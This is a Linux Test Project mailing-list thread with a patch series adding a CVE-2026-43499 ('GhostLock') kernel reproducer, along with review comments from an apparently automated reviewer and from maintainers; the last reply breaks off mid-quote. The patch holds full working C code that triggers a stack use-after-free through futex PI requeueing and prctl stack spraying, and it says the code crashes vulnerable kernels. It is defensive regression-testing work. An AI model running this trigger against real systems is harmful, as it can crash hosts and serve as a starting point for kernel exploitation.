* [LTP] [PATCH v4 0/2] Reproducer for ghostlock
@ 2026-08-26 12:40 Andrea Cervesato
2026-08-26 12:40 ` [LTP] [PATCH v4 1/2] lapi/prctl: add more fallback definitions Andrea Cervesato
2026-08-26 12:40 ` [LTP] [PATCH v4 2/2] cve: add CVE-2026-43499 reproducer Andrea Cervesato
0 siblings, 2 replies; 10+ messages in thread
From: Andrea Cervesato @ 2026-08-26 12:40 UTC (permalink / raw)
To: Linux Test Project
Test for CVE-2026-43499 (GhostLock), a stack use-after-free in the
rtmutex PI code, fixed in kernel v7.1:
3bfdc63936dd ("rtmutex: Use waiter::task instead of current in remove_waiter()")
Reproducer based on the Nebula Security writeup and open-sourced PoC
(https://nebusec.ai/research/ionstack-part-2/, https://github.com/NebuSec/CyberMeowfia).
Beware, this test will crash the system on a vulnerable kernel.
Assisted by Kimi K3 for the analysis and written mostly with Gemini Pro
3.1 Max.
Signed-off-by: Andrea Cervesato <andrea.cervesato@suse.com>
---
Changes in v4:
- handle runtime inside the test
- increase futext wait so we don't TBROK before runtime
- comment prctl() syscall
- move static vars out of the run function
- Link to v3: https://lore.kernel.org/20260803-cve-ghostlock-v3-0-cde83fa429b7@suse.com
Changes in v3:
- improve sync mechanism
- fix lapi imports
- Link to v2: https://lore.kernel.org/20260803-cve-ghostlock-v2-0-b60588853140@suse.com
Changes in v2:
- fix build
- fix 32bit run
- Link to v1: https://lore.kernel.org/20260801-cve-ghostlock-v1-0-178f698f9702@suse.com
---
Andrea Cervesato (2):
lapi/prctl: add more fallback definitions
cve: add CVE-2026-43499 reproducer
configure.ac | 2 +
include/lapi/prctl.h | 25 +++++
runtest/cve | 1 +
testcases/cve/.gitignore | 1 +
testcases/cve/Makefile | 1 +
testcases/cve/ghostlock.c | 258 ++++++++++++++++++++++++++++++++++++++++++++++
6 files changed, 288 insertions(+)
---
base-commit: 9118a480cc68700f27944aab817e0202e9e6136c
change-id: 20260801-cve-ghostlock-6ee4b2f69fd6
Best regards,
--
Andrea Cervesato <andrea.cervesato@suse.com>
--
Mailing list info: https://lists.linux.it/listinfo/ltp
^ permalink raw reply [flat|nested] 10+ messages in thread* [LTP] [PATCH v4 1/2] lapi/prctl: add more fallback definitions 2026-08-26 12:40 [LTP] [PATCH v4 0/2] Reproducer for ghostlock Andrea Cervesato @ 2026-08-26 12:40 ` Andrea Cervesato 2026-08-27 8:36 ` [LTP] " linuxtestproject.agent 2026-08-26 12:40 ` [LTP] [PATCH v4 2/2] cve: add CVE-2026-43499 reproducer Andrea Cervesato 1 sibling, 1 reply; 10+ messages in thread From: Andrea Cervesato @ 2026-08-26 12:40 UTC (permalink / raw) To: Linux Test Project From: Andrea Cervesato <andrea.cervesato@suse.com> Add the following fallback definitions: - PR_SET_MM - PR_SET_MM_MAP - PR_SET_MM_MAP_SIZE - struct prctl_mm_map Signed-off-by: Andrea Cervesato <andrea.cervesato@suse.com> --- configure.ac | 2 ++ include/lapi/prctl.h | 25 +++++++++++++++++++++++++ 2 files changed, 27 insertions(+) diff --git a/configure.ac b/configure.ac index 19fc5e1b8..052b83e04 100644 --- a/configure.ac +++ b/configure.ac @@ -286,6 +286,8 @@ AC_CHECK_TYPES([struct fsxattr],,,[#include <linux/fs.h>]) AC_CHECK_TYPES([struct logical_block_metadata_cap],,,[#include <linux/fs.h>]) +AC_CHECK_TYPES([struct prctl_mm_map],,,[#include <sys/prctl.h>]) + AC_CHECK_TYPES([struct sockaddr_vm],,,[ #include <sys/socket.h> #include <linux/vm_sockets.h> diff --git a/include/lapi/prctl.h b/include/lapi/prctl.h index 8d3ef5c32..278401bb7 100644 --- a/include/lapi/prctl.h +++ b/include/lapi/prctl.h @@ -7,6 +7,7 @@ #ifndef LAPI_PRCTL_H__ #define LAPI_PRCTL_H__ +#include <stdint.h> #include <sys/prctl.h> #ifndef PR_SET_NAME @@ -59,4 +60,28 @@ # define PR_SET_SPECULATION_CTRL 53 #endif +#ifndef PR_SET_MM +# define PR_SET_MM 35 +#endif +#ifndef PR_SET_MM_MAP +# define PR_SET_MM_MAP 14 +#endif +#ifndef PR_SET_MM_MAP_SIZE +# define PR_SET_MM_MAP_SIZE 15 +#endif + +#if !(HAVE_STRUCT_PRCTL_MM_MAP) && !defined(PR_SET_MM_MAP) +struct prctl_mm_map { + uint64_t start_code, end_code; + uint64_t start_data, end_data; + uint64_t start_brk, brk; + uint64_t start_stack; + uint64_t arg_start, arg_end; + uint64_t env_start, env_end; + uint64_t *auxv; + uint32_t auxv_size; + uint32_t exe_fd; +}; +#endif + #endif /* LAPI_PRCTL_H__ */ -- 2.51.0 -- Mailing list info: https://lists.linux.it/listinfo/ltp ^ permalink raw reply related [flat|nested] 10+ messages in thread
* Re: [LTP] lapi/prctl: add more fallback definitions 2026-08-26 12:40 ` [LTP] [PATCH v4 1/2] lapi/prctl: add more fallback definitions Andrea Cervesato @ 2026-08-27 8:36 ` linuxtestproject.agent 2026-08-27 8:51 ` Andrea Cervesato via ltp 0 siblings, 1 reply; 10+ messages in thread From: linuxtestproject.agent @ 2026-08-27 8:36 UTC (permalink / raw) To: Andrea Cervesato; +Cc: ltp Hi Andrea, On Aug 26, 2026, Andrea Cervesato wrote: > lapi/prctl: add more fallback definitions --- [PATCH 1/2] --- > +#ifndef PR_SET_MM_MAP > +# define PR_SET_MM_MAP 14 > +#endif > +#ifndef PR_SET_MM_MAP_SIZE > +# define PR_SET_MM_MAP_SIZE 15 > +#endif > + > +#if !(HAVE_STRUCT_PRCTL_MM_MAP) && !defined(PR_SET_MM_MAP) > +struct prctl_mm_map { Could the struct guard depend only on HAVE_STRUCT_PRCTL_MM_MAP? Since PR_SET_MM_MAP is defined immediately above, !defined(PR_SET_MM_MAP) is always false here. On systems missing struct prctl_mm_map, the fallback is therefore not emitted and ghostlock.c fails to compile. --- [PATCH 2/2] --- > + map.start_code = map.start_data = map.end_data = > + map.start_brk = map.brk = map.start_stack = map.arg_start = > + map.arg_end = map.env_start = map.env_end = (uint64_t)(uintptr_t)&sz; > + map.end_code = map.start_code + 0x1000; Could this probe use the real process map values, as waiter_fn() does? A successful PR_SET_MM_MAP call writes these values into current->mm. In particular, start_brk and brk remain set to setup()'s local stack address after setup() returns. A later brk() allocation below that address is rejected as being below mm->start_brk, so pthread creation or another allocation can fail for a reason unrelated to the CVE. > +static struct tst_test test = { > + .setup = setup, > + .test_all = run, > + .runtime = 180, Could this declare .min_kver = "3.18", or otherwise treat EINVAL from PR_SET_MM_MAP_SIZE as an unavailable prerequisite? PR_SET_MM_MAP was added in Linux 3.18, while the CVE affects older kernels. On such a kernel, SAFE_PRCTL() currently reports TBROK rather than TCONF. > cve-2014-0196 cve-2016-7117 cve-2017-2671 cve-2017-17052 cve-2017-17053 refluxfs: CFLAGS += -pthread > +cve-2014-0196 cve-2016-7117 cve-2017-2671 cve-2017-17052 cve-2017-17053 ghostlock: CFLAGS += -pthread Could ghostlock be added to the existing assignment instead? The new line passes -pthread twice to every pre-existing target listed there. > refluxfs > sctphantom > +ghostlock Could ghostlock be inserted in sorted order? Verdict - Needs revision --- Note: The agent can sometimes produce false positives although often its findings are genuine. If you find issues with the review, please comment this email or ignore the suggestions. Regards, LTP AI Reviewer -- Mailing list info: https://lists.linux.it/listinfo/ltp ^ permalink raw reply [flat|nested] 10+ messages in thread
* Re: [LTP] lapi/prctl: add more fallback definitions 2026-08-27 8:36 ` [LTP] " linuxtestproject.agent @ 2026-08-27 8:51 ` Andrea Cervesato via ltp 0 siblings, 0 replies; 10+ messages in thread From: Andrea Cervesato via ltp @ 2026-08-27 8:51 UTC (permalink / raw) To: linuxtestproject.agent; +Cc: ltp > > +static struct tst_test test = { > > + .setup = setup, > > + .test_all = run, > > + .runtime = 180, > > Could this declare .min_kver = "3.18", or otherwise treat EINVAL from > PR_SET_MM_MAP_SIZE as an unavailable prerequisite? PR_SET_MM_MAP was added in > Linux 3.18, while the CVE affects older kernels. On such a kernel, > SAFE_PRCTL() currently reports TBROK rather than TCONF. > > > cve-2014-0196 cve-2016-7117 cve-2017-2671 cve-2017-17052 cve-2017-17053 refluxfs: CFLAGS += -pthread > > +cve-2014-0196 cve-2016-7117 cve-2017-2671 cve-2017-17052 cve-2017-17053 ghostlock: CFLAGS += -pthread > > Could ghostlock be added to the existing assignment instead? The new line > passes -pthread twice to every pre-existing target listed there. > > > refluxfs > > sctphantom > > +ghostlock > > Could ghostlock be inserted in sorted order? only these two are valid, the rest can be ignored. -- Andrea Cervesato SUSE QE Automation Engineer Linux andrea.cervesato@suse.com -- Mailing list info: https://lists.linux.it/listinfo/ltp ^ permalink raw reply [flat|nested] 10+ messages in thread
* [LTP] [PATCH v4 2/2] cve: add CVE-2026-43499 reproducer 2026-08-26 12:40 [LTP] [PATCH v4 0/2] Reproducer for ghostlock Andrea Cervesato 2026-08-26 12:40 ` [LTP] [PATCH v4 1/2] lapi/prctl: add more fallback definitions Andrea Cervesato @ 2026-08-26 12:40 ` Andrea Cervesato 2026-09-01 8:36 ` Cyril Hrubis 1 sibling, 1 reply; 10+ messages in thread From: Andrea Cervesato @ 2026-08-26 12:40 UTC (permalink / raw) To: Linux Test Project From: Andrea Cervesato <andrea.cervesato@suse.com> Add "Ghostlock" reproducer for CVE-2026-43499. Reproducer based on the Nebula Security writeup and open-sourced PoC (https://nebusec.ai/research/ionstack-part-2/, https://github.com/NebuSec/CyberMeowfia). Beware, this test will crash the system on a vulnerable kernel. Signed-off-by: Andrea Cervesato <andrea.cervesato@suse.com> --- runtest/cve | 1 + testcases/cve/.gitignore | 1 + testcases/cve/Makefile | 1 + testcases/cve/ghostlock.c | 258 ++++++++++++++++++++++++++++++++++++++++++++++ 4 files changed, 261 insertions(+) diff --git a/runtest/cve b/runtest/cve index b096bacef..ac721f453 100644 --- a/runtest/cve +++ b/runtest/cve @@ -87,6 +87,7 @@ cve-2022-23222 bpf_prog07 cve-2023-1829 tcindex01 cve-2023-0461 setsockopt10 cve-2023-31248 nft02 +cve-2026-43499 ghostlock cve-2023-52879 fanotify25 cve-2026-53362 setsockopt11 cve-2026-64600 refluxfs diff --git a/testcases/cve/.gitignore b/testcases/cve/.gitignore index a167a8743..f25aaf23a 100644 --- a/testcases/cve/.gitignore +++ b/testcases/cve/.gitignore @@ -18,3 +18,4 @@ cve-2025-21756 cve-2026-46331 refluxfs sctphantom +ghostlock diff --git a/testcases/cve/Makefile b/testcases/cve/Makefile index 6be4999a3..92d876707 100644 --- a/testcases/cve/Makefile +++ b/testcases/cve/Makefile @@ -12,6 +12,7 @@ stack_clash: CFLAGS += -fno-optimize-sibling-calls -Wno-infinite-recursion cve-2016-7042: LDLIBS += $(KEYUTILS_LIBS) cve-2014-0196 cve-2016-7117 cve-2017-2671 cve-2017-17052 cve-2017-17053 refluxfs: CFLAGS += -pthread +cve-2014-0196 cve-2016-7117 cve-2017-2671 cve-2017-17052 cve-2017-17053 ghostlock: CFLAGS += -pthread cve-2014-0196 cve-2016-7117 cve-2017-2671: LDLIBS += -lrt ifneq ($(ANDROID),1) diff --git a/testcases/cve/ghostlock.c b/testcases/cve/ghostlock.c new file mode 100644 index 000000000..e143e33a4 --- /dev/null +++ b/testcases/cve/ghostlock.c @@ -0,0 +1,258 @@ +// SPDX-License-Identifier: GPL-2.0-or-later +/* + * Copyright (c) 2026 Nebula Security <root@nebusec.ai> + * Copyright (c) 2026 Linux Test Project + */ + +/*\ + * Test for CVE-2026-43499 (GhostLock), a stack use-after-free in the + * rtmutex PI code, fixed in kernel v7.1: + * 3bfdc63936dd ("rtmutex: Use waiter::task instead of current in remove_waiter()") + * + * Reproducer based on the Nebula Security writeup and open-sourced PoC + * (https://nebusec.ai/research/ionstack-part-2/ and + * https://github.com/NebuSec/CyberMeowfia). + * Beware, this test will crash the system on a vulnerable kernel. + * + * [Algorithm] + * + * - Set up a three-futex PI deadlock topology. + * - Call :manpage:`futex(2)` with FUTEX_CMP_REQUEUE_PI on the waiter. + * - On a vulnerable kernel, the rollback from -EDEADLK leaves the waiter's + * pi_blocked_on pointer dangling on its own stack. + * - Waiter sprays its stack continuously via :manpage:`prctl(2)` (PR_SET_MM_MAP) + * with non-canonical addresses while main thread calls :manpage:`sched_setattr(2)` + * on the waiter to trigger a chain walk. + * - The chain walk dereferences the sprayed garbage, crashing a vulnerable + * kernel. + */ + +#include "tst_test.h" +#include "tst_timer.h" +#include "tst_safe_clocks.h" +#include "tst_safe_pthread.h" +#include "lapi/syscalls.h" +#include "lapi/sched.h" +#include "lapi/prctl.h" +#include "lapi/futex.h" + +#define ATTEMPTS 128 +#define POISON_PTR 0xdeadbee11c518f58ULL +#define MAX_AUXV_WORDS 48 + +#define CP_CHAIN_HELD 0 +#define CP_TARGET_HELD 1 +#define CP_OWNER_BLOCKED 2 +#define CP_SPRAYED 3 +#define CP_SETATTR_DONE 4 + +static uint32_t f_wait; +static uint32_t f_pi_target; +static uint32_t f_pi_chain; + +static pid_t waiter_tid; +static pid_t owner_tid; + +static unsigned long auxv[MAX_AUXV_WORDS]; +static uint32_t valid_auxv_size; +static tst_atomic_t stop_spray; + +static const int try_sizes[] = { + MAX_AUXV_WORDS, + MAX_AUXV_WORDS - 4, + MAX_AUXV_WORDS - 8 +}; + +static int futex_wait_requeue_pi(uint32_t *uaddr, uint32_t *uaddr2, + struct timespec *ts) +{ + return tst_syscall(__NR_futex, uaddr, FUTEX_WAIT_REQUEUE_PI, 0, ts, + uaddr2, 0); +} + +static int futex_cmp_requeue_pi(uint32_t *uaddr, uint32_t *uaddr2) +{ + return tst_syscall(__NR_futex, uaddr, FUTEX_CMP_REQUEUE_PI, 1, 1, + uaddr2, 0); +} + +static int futex_lock_pi(uint32_t *uaddr) +{ + return tst_syscall(__NR_futex, uaddr, FUTEX_LOCK_PI, 0, 0, 0, 0); +} + +static int futex_unlock_pi(uint32_t *uaddr) +{ + return tst_syscall(__NR_futex, uaddr, FUTEX_UNLOCK_PI, 0, 0, 0, 0); +} + +static void *waiter_fn(void *arg LTP_ATTRIBUTE_UNUSED) +{ + struct timespec ts; + struct prctl_mm_map mm_map = { + .start_code = (uint64_t)(uintptr_t)&waiter_fn, + .end_code = (uint64_t)(uintptr_t)&waiter_fn + 0x1000, + .start_data = (uint64_t)(uintptr_t)auxv & ~0xfffUL, + .end_data = ((uint64_t)(uintptr_t)auxv & ~0xfffUL) + 0x1000, + .start_brk = (uint64_t)(uintptr_t)sbrk(0), + .brk = (uint64_t)(uintptr_t)sbrk(0), + .start_stack = (uint64_t)(uintptr_t)&mm_map, + .arg_start = (uint64_t)(uintptr_t)&mm_map, + .arg_end = (uint64_t)(uintptr_t)&mm_map, + .env_start = (uint64_t)(uintptr_t)&mm_map, + .env_end = (uint64_t)(uintptr_t)&mm_map, + .auxv = (void *)auxv, + .auxv_size = valid_auxv_size, + .exe_fd = (uint32_t)-1, + }; + + waiter_tid = tst_syscall(__NR_gettid); + + futex_lock_pi(&f_pi_chain); + + TST_CHECKPOINT_WAKE2(CP_CHAIN_HELD, 2); + TST_CHECKPOINT_WAIT(CP_OWNER_BLOCKED); + + SAFE_CLOCK_GETTIME(CLOCK_MONOTONIC, &ts); + ts = tst_timespec_add(ts, (struct timespec){ .tv_sec = 10, .tv_nsec = 0 }); + futex_wait_requeue_pi(&f_wait, &f_pi_target, &ts); + + TST_CHECKPOINT_WAKE(CP_SPRAYED); + + while (!tst_atomic_load(&stop_spray)) { + /* This is the syscall that poison the buffer and it might + * fail, so we don't use the SAFE_* variant. + */ + prctl(PR_SET_MM, PR_SET_MM_MAP, (unsigned long)&mm_map, + sizeof(mm_map), 0); + } + + TST_CHECKPOINT_WAIT(CP_SETATTR_DONE); + + futex_unlock_pi(&f_pi_chain); + + return NULL; +} + +static void *owner_fn(void *arg LTP_ATTRIBUTE_UNUSED) +{ + owner_tid = tst_syscall(__NR_gettid); + + TST_CHECKPOINT_WAIT(CP_CHAIN_HELD); + + futex_lock_pi(&f_pi_target); + TST_CHECKPOINT_WAKE(CP_TARGET_HELD); + + futex_lock_pi(&f_pi_chain); + + futex_unlock_pi(&f_pi_chain); + futex_unlock_pi(&f_pi_target); + + return NULL; +} + +static void setup(void) +{ + struct prctl_mm_map map = { + .exe_fd = (uint32_t)-1, + .auxv = (void *)auxv, + }; + unsigned int i, sz = 0; + + SAFE_PRCTL(PR_SET_MM, PR_SET_MM_MAP_SIZE, (unsigned long)&sz, 0, 0); + + for (i = 0; i < MAX_AUXV_WORDS; i++) + auxv[i] = POISON_PTR + i * sizeof(unsigned long); + + map.start_code = map.start_data = map.end_data = + map.start_brk = map.brk = map.start_stack = map.arg_start = + map.arg_end = map.env_start = map.env_end = (uint64_t)(uintptr_t)&sz; + map.end_code = map.start_code + 0x1000; + + for (i = 0; i < ARRAY_SIZE(try_sizes); i++) { + valid_auxv_size = try_sizes[i] * sizeof(unsigned long); + map.auxv_size = valid_auxv_size; + + if (prctl(PR_SET_MM, PR_SET_MM_MAP, &map, sizeof(map), 0) == 0) + break; + } + + if (i == ARRAY_SIZE(try_sizes)) + tst_brk(TBROK | TERRNO, "PR_SET_MM_MAP failed for all auxv sizes"); + + tst_res(TDEBUG, "Using auxv_size = %u", valid_auxv_size); +} + +static void run(void) +{ + pthread_t waiter_th, owner_th; + struct sched_attr attr = { + .size = sizeof(attr), + .sched_policy = SCHED_BATCH, + .sched_nice = 19, + }; + int i; + + tst_res(TINFO, "Triggering PI deadlock and stack spray"); + + for (i = 0; i < ATTEMPTS; i++) { + if (!tst_remaining_runtime()) + break; + + f_wait = 0; + f_pi_target = 0; + f_pi_chain = 0; + tst_atomic_store(0, &stop_spray); + + SAFE_PTHREAD_CREATE(&waiter_th, NULL, waiter_fn, NULL); + SAFE_PTHREAD_CREATE(&owner_th, NULL, owner_fn, NULL); + + TST_CHECKPOINT_WAIT(CP_CHAIN_HELD); + TST_CHECKPOINT_WAIT(CP_TARGET_HELD); + + TST_THREAD_STATE_WAIT(owner_tid, 'S', 10000); + + TST_CHECKPOINT_WAKE(CP_OWNER_BLOCKED); + + TST_THREAD_STATE_WAIT(waiter_tid, 'S', 10000); + + TEST(futex_cmp_requeue_pi(&f_wait, &f_pi_target)); + if (TST_RET != -1 || TST_ERR != EDEADLK) + tst_brk(TBROK | TTERRNO, "FUTEX_CMP_REQUEUE_PI did not return -EDEADLK"); + + TST_CHECKPOINT_WAIT2(CP_SPRAYED, 18000); + + TEST(sched_setattr(waiter_tid, &attr, 0)); + if (TST_RET == -1) + tst_brk(TBROK | TTERRNO, "sched_setattr() failed"); + + tst_atomic_store(1, &stop_spray); + TST_CHECKPOINT_WAKE(CP_SETATTR_DONE); + + SAFE_PTHREAD_JOIN(waiter_th, NULL); + SAFE_PTHREAD_JOIN(owner_th, NULL); + } + + if (i < ATTEMPTS) + tst_res(TINFO, "Runtime exhausted, executed %d/%d attempts", i, ATTEMPTS); + + tst_res(TPASS, "Kernel survived %d GhostLock trigger attempts", i); +} + +static struct tst_test test = { + .setup = setup, + .test_all = run, + .runtime = 180, + .needs_checkpoints = 1, + .needs_kconfigs = (const char *[]) { + "CONFIG_CHECKPOINT_RESTORE=y", + "CONFIG_FUTEX_PI=y", + NULL + }, + .taint_check = TST_TAINT_W | TST_TAINT_D, + .tags = (const struct tst_tag[]) { + {"linux-git", "3bfdc63936dd"}, + {"CVE", "2026-43499"}, + {} + }, +}; -- 2.51.0 -- Mailing list info: https://lists.linux.it/listinfo/ltp ^ permalink raw reply related [flat|nested] 10+ messages in thread
* Re: [LTP] [PATCH v4 2/2] cve: add CVE-2026-43499 reproducer 2026-08-26 12:40 ` [LTP] [PATCH v4 2/2] cve: add CVE-2026-43499 reproducer Andrea Cervesato @ 2026-09-01 8:36 ` Cyril Hrubis 0 siblings, 0 replies; 10+ messages in thread From: Cyril Hrubis @ 2026-09-01 8:36 UTC (permalink / raw) To: Andrea Cervesato; +Cc: Linux Test Project Hi! > Signed-off-by: Andrea Cervesato <andrea.cervesato@suse.com> > --- > runtest/cve | 1 + > testcases/cve/.gitignore | 1 + > testcases/cve/Makefile | 1 + > testcases/cve/ghostlock.c | 258 ++++++++++++++++++++++++++++++++++++++++++++++ > 4 files changed, 261 insertions(+) > > diff --git a/runtest/cve b/runtest/cve > index b096bacef..ac721f453 100644 > --- a/runtest/cve > +++ b/runtest/cve > @@ -87,6 +87,7 @@ cve-2022-23222 bpf_prog07 > cve-2023-1829 tcindex01 > cve-2023-0461 setsockopt10 > cve-2023-31248 nft02 > +cve-2026-43499 ghostlock > cve-2023-52879 fanotify25 > cve-2026-53362 setsockopt11 > cve-2026-64600 refluxfs > diff --git a/testcases/cve/.gitignore b/testcases/cve/.gitignore > index a167a8743..f25aaf23a 100644 > --- a/testcases/cve/.gitignore > +++ b/testcases/cve/.gitignore > @@ -18,3 +18,4 @@ cve-2025-21756 > cve-2026-46331 > refluxfs > sctphantom > +ghostlock > diff --git a/testcases/cve/Makefile b/testcases/cve/Makefile > index 6be4999a3..92d876707 100644 > --- a/testcases/cve/Makefile > +++ b/testcases/cve/Makefile > @@ -12,6 +12,7 @@ stack_clash: CFLAGS += -fno-optimize-sibling-calls -Wno-infinite-recursion > cve-2016-7042: LDLIBS += $(KEYUTILS_LIBS) > > cve-2014-0196 cve-2016-7117 cve-2017-2671 cve-2017-17052 cve-2017-17053 refluxfs: CFLAGS += -pthread > +cve-2014-0196 cve-2016-7117 cve-2017-2671 cve-2017-17052 cve-2017-17053 ghostlock: CFLAGS += -pthread > cve-2014-0196 cve-2016-7117 cve-2017-2671: LDLIBS += -lrt > > ifneq ($(ANDROID),1) > diff --git a/testcases/cve/ghostlock.c b/testcases/cve/ghostlock.c > new file mode 100644 > index 000000000..e143e33a4 > --- /dev/null > +++ b/testcases/cve/ghostlock.c > @@ -0,0 +1,258 @@ > +// SPDX-License-Identifier: GPL-2.0-or-later > +/* > + * Copyright (c) 2026 Nebula Security <root@nebusec.ai> > + * Copyright (c) 2026 Linux Test Project > + */ > + > +/*\ > + * Test for CVE-2026-43499 (GhostLock), a stack use-after-free in the > + * rtmutex PI code, fixed in kernel v7.1: > + * 3bfdc63936dd ("rtmutex: Use waiter::task instead of current in remove_waiter()") > + * > + * Reproducer based on the Nebula Security writeup and open-sourced PoC > + * (https://nebusec.ai/research/ionstack-part-2/ and > + * https://github.com/NebuSec/CyberMeowfia). > + * Beware, this test will crash the system on a vulnerable kernel. > + * > + * [Algorithm] > + * > + * - Set up a three-futex PI deadlock topology. > + * - Call :manpage:`futex(2)` with FUTEX_CMP_REQUEUE_PI on the waiter. > + * - On a vulnerable kernel, the rollback from -EDEADLK leaves the waiter's > + * pi_blocked_on pointer dangling on its own stack. > + * - Waiter sprays its stack continuously via :manpage:`prctl(2)` (PR_SET_MM_MAP) > + * with non-canonical addresses while main thread calls :manpage:`sched_setattr(2)` > + * on the waiter to trigger a chain walk. > + * - The chain walk dereferences the sprayed garbage, crashing a vulnerable > + * kernel. > + */ > + > +#include "tst_test.h" > +#include "tst_timer.h" > +#include "tst_safe_clocks.h" > +#include "tst_safe_pthread.h" > +#include "lapi/syscalls.h" > +#include "lapi/sched.h" > +#include "lapi/prctl.h" > +#include "lapi/futex.h" > + > +#define ATTEMPTS 128 > +#define POISON_PTR 0xdeadbee11c518f58ULL > +#define MAX_AUXV_WORDS 48 > + > +#define CP_CHAIN_HELD 0 > +#define CP_TARGET_HELD 1 > +#define CP_OWNER_BLOCKED 2 > +#define CP_SPRAYED 3 > +#define CP_SETATTR_DONE 4 > + > +static uint32_t f_wait; > +static uint32_t f_pi_target; > +static uint32_t f_pi_chain; > + > +static pid_t waiter_tid; > +static pid_t owner_tid; > + > +static unsigned long auxv[MAX_AUXV_WORDS]; > +static uint32_t valid_auxv_size; > +static tst_atomic_t stop_spray; > + > +static const int try_sizes[] = { > + MAX_AUXV_WORDS, > + MAX_AUXV_WORDS - 4, > + MAX_AUXV_WORDS - 8 > +}; > + > +static int futex_wait_requeue_pi(uint32_t *uaddr, uint32_t *uaddr2, > + struct timespec *ts) > +{ > + return tst_syscall(__NR_futex, uaddr, FUTEX_WAIT_REQUEUE_PI, 0, ts, > + uaddr2, 0); > +} > + > +static int futex_cmp_requeue_pi(uint32_t *uaddr, uint32_t *uaddr2) > +{ > + return tst_syscall(__NR_futex, uaddr, FUTEX_CMP_REQUEUE_PI, 1, 1, > + uaddr2, 0); > +} > + > +static int futex_lock_pi(uint32_t *uaddr) > +{ > + return tst_syscall(__NR_futex, uaddr, FUTEX_LOCK_PI, 0, 0, 0, 0); > +} > + > +static int futex_unlock_pi(uint32_t *uaddr) > +{ > + return tst_syscall(__NR_futex, uaddr, FUTEX_UNLOCK_PI, 0, 0, 0, 0); > +} > + > +static void *waiter_fn(void *arg LTP_ATTRIBUTE_UNUSED) > +{ > + struct timespec ts; > + struct prctl_mm_map mm_map = { > + .start_code = (uint64_t)(uintptr_t)&waiter_fn, > + .end_code = (uint64_t)(uintptr_t)&waiter_fn + 0x1000, > + .start_data = (uint64_t)(uintptr_t)auxv & ~0xfffUL, > + .end_data = ((uint64_t)(uintptr_t)auxv & ~0xfffUL) + 0x1000, > + .start_brk = (uint64_t)(uintptr_t)sbrk(0), > + .brk = (uint64_t)(uintptr_t)sbrk(0), > + .start_stack = (uint64_t)(uintptr_t)&mm_map, > + .arg_start = (uint64_t)(uintptr_t)&mm_map, > + .arg_end = (uint64_t)(uintptr_t)&mm_map, > + .env_start = (uint64_t)(uintptr_t)&mm_map, > + .env_end = (uint64_t)(uintptr_t)&mm_map, > + .auxv = (void *)auxv, > + .auxv_size = valid_auxv_size, > + .exe_fd = (uint32_t)-1, > + }; > + > + waiter_tid = tst_syscall(__NR_gettid); > + > + futex_lock_pi(&f_pi_chain); > + > + TST_CHECKPOINT_WAKE2(CP_CHAIN_HELD, 2); > + TST_CHECKPOINT_WAIT(CP_OWNER_BLOCKED); > + > + SAFE_CLOCK_GETTIME(CLOCK_MONOTONIC, &ts); > + ts = tst_timespec_add(ts, (struct timespec){ .tv_sec = 10, .tv_nsec = 0 }); > + futex_wait_requeue_pi(&f_wait, &f_pi_target, &ts); > + > + TST_CHECKPOINT_WAKE(CP_SPRAYED); > + > + while (!tst_atomic_load(&stop_spray)) { > + /* This is the syscall that poison the buffer and it might > + * fail, so we don't use the SAFE_* variant. > + */ > + prctl(PR_SET_MM, PR_SET_MM_MAP, (unsigned long)&mm_map, > + sizeof(mm_map), 0); > + } > + > + TST_CHECKPOINT_WAIT(CP_SETATTR_DONE); > + > + futex_unlock_pi(&f_pi_chain); > + > + return NULL; > +} > + > +static void *owner_fn(void *arg LTP_ATTRIBUTE_UNUSED) > +{ > + owner_tid = tst_syscall(__NR_gettid); > + > + TST_CHECKPOINT_WAIT(CP_CHAIN_HELD); > + > + futex_lock_pi(&f_pi_target); > + TST_CHECKPOINT_WAKE(CP_TARGET_HELD); > + > + futex_lock_pi(&f_pi_chain); > + > + futex_unlock_pi(&f_pi_chain); > + futex_unlock_pi(&f_pi_target); > + > + return NULL; > +} > + > +static void setup(void) > +{ > + struct prctl_mm_map map = { > + .exe_fd = (uint32_t)-1, > + .auxv = (void *)auxv, > + }; > + unsigned int i, sz = 0; > + > + SAFE_PRCTL(PR_SET_MM, PR_SET_MM_MAP_SIZE, (unsigned long)&sz, 0, 0); > + > + for (i = 0; i < MAX_AUXV_WORDS; i++) > + auxv[i] = POISON_PTR + i * sizeof(unsigned long); > + > + map.start_code = map.start_data = map.end_data = > + map.start_brk = map.brk = map.start_stack = map.arg_start = > + map.arg_end = map.env_start = map.env_end = (uint64_t)(uintptr_t)&sz; > + map.end_code = map.start_code + 0x1000; > + > + for (i = 0; i < ARRAY_SIZE(try_sizes); i++) { > + valid_auxv_size = try_sizes[i] * sizeof(unsigned long); > + map.auxv_size = valid_auxv_size; > + > + if (prctl(PR_SET_MM, PR_SET_MM_MAP, &map, sizeof(map), 0) == 0) > + break; > + } > + > + if (i == ARRAY_SIZE(try_sizes)) > + tst_brk(TBROK | TERRNO, "PR_SET_MM_MAP failed for all auxv sizes"); > + > + tst_res(TDEBUG, "Using auxv_size = %u", valid_auxv_size); > +} > + > +static void run(void) > +{ > + pthread_t waiter_th, owner_th; > + struct sched_attr attr = { > + .size = sizeof(attr), > + .sched_policy = SCHED_BATCH, > + .sched_nice = 19, > + }; > + int i; > + > + tst_res(TINFO, "Triggering PI deadlock and stack spray"); > + > + for (i = 0; i < ATTEMPTS; i++) { > + if (!tst_remaining_runtime()) > + break; > + > + f_wait = 0; > + f_pi_target = 0; > + f_pi_chain = 0; > + tst_atomic_store(0, &stop_spray); > + > + SAFE_PTHREAD_CREATE(&waiter_th, NULL, waiter_fn, NULL); > + SAFE_PTHREAD_CREATE(&owner_th, NULL, owner_fn, NULL); > + > + TST_CHECKPOINT_WAIT(CP_CHAIN_HELD); Isn't this one redundant? All we have to do here is to wait for the owner for the CP_TARGET_HELD and let the two threads synchronize between each other, or do I miss something? I also think that we can reduce the number of checkpoints just to three. Two for synchronization between the main thread and the two threads we created and one for the synchronization between the two threads. > + TST_CHECKPOINT_WAIT(CP_TARGET_HELD); > + > + TST_THREAD_STATE_WAIT(owner_tid, 'S', 10000); > + > + TST_CHECKPOINT_WAKE(CP_OWNER_BLOCKED); > + > + TST_THREAD_STATE_WAIT(waiter_tid, 'S', 10000); > + > + TEST(futex_cmp_requeue_pi(&f_wait, &f_pi_target)); > + if (TST_RET != -1 || TST_ERR != EDEADLK) > + tst_brk(TBROK | TTERRNO, "FUTEX_CMP_REQUEUE_PI did not return -EDEADLK"); > + > + TST_CHECKPOINT_WAIT2(CP_SPRAYED, 18000); > + > + TEST(sched_setattr(waiter_tid, &attr, 0)); > + if (TST_RET == -1) > + tst_brk(TBROK | TTERRNO, 